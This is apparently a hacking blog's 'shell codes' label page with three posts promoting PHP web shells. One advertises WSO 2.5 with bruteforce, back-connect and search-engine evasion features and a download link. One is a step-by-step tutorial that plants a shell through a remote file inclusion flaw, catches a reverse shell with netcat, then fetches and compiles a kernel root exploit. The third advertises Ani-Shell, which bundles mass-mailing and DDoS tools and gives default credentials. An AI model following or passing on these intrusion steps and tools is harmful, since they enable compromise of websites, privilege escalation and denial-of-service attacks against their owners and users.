Showing posts with label shell codes. Show all posts

WSO2.5 Web Shellcode

8:10 am , 1 comments

WSO New Version 2.5 Web Shell 



This utility provides a web interface for remote operation c operating system and its services / daemons.


Opportunity Description / Features

Authorization for the cookies
Server Information
File manager (copy, rename, move, delete, chmod, touch, create files and folders)
View, hexview, editing, downloading, uploading files
Working with zip archives (packing, unpacking) + compression tar.gz
Console
SQL Manager (MySql, PostgreSql)
Execute PHP code
Working with Strings + hash search online databases
Bindport and back-Connect (Perl)
Bruteforce FTP, MySQL, PgSQL
Search files, search text in files
Support for * nix-like and Windows systems
Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
You can use AJAX
Small size. Packaged version is 22.8 Kb
The choice of encoding, which employs a shell. 




Changelog (v2.5)

Instead, the sessions are now used cookies
Fixed search for exploit-db.com
Removed Section Safe-mode
Shell works correctly when disabled_functions = scandir
Now you can search not only text files, but just files on a mask
Redesigned mysql dump
Changed the service list in the "Search for hash"
Removed images from phpinfo ()
"Small cosmetics
Correction of other minor bugs




 Download here
 Read more

MulCi Shellcode

2:33 pm 0 comments
MulCi Shellcode for Website Hacking

 What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains

 First of all, we need to get a shell on a site.
For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back connect' tab and insert the following settings:
[Image: 2mnow9z.png]
1- Your IP Address.
2-The port you forwarded.

 Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

 It looked like this for me:

 Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

 C:\KroKite>cd C:\

 C:\>cd WINDOWS

 C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

 Now, when you have netcat listening to the port you forwarded, click 'Connect'.

 When your connected, type 'whoami'.You shouldnt have root.

 Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

 It should look something like this:
Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 0805 EDT 2008 i686
Now, we go on exploit-db.com and we will look for '2.6.17'.
Code:
hhttp://www.exploit-db.com/exploits/5092/

 Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.
Code:
wget http://xpl_url.com

 So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

 To do this we type 'gcc 5092 -o
Read more

Ani-Shell v1.0 - PHP shell

1:49 pm 0 comments

Ani-Shell v1.0 - PHP shell with features like Mass-Mailer , Fuzzer , DDoser




Ani-Shell v1.0 - PHP shell 
Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDoser ! This shell has immense capabilities and have been
written with some coding standards in mind for better editing and customization.
Features
-- Shell
-- Plateform Independent
-- Mass - Mailer
-- Small Web-Server Fuzzer
-- DDoser
-- Design
Username : lionaneesh
Password : lionaneesh
Download & More Info
 Read more
Subscribe to: Posts (Atom)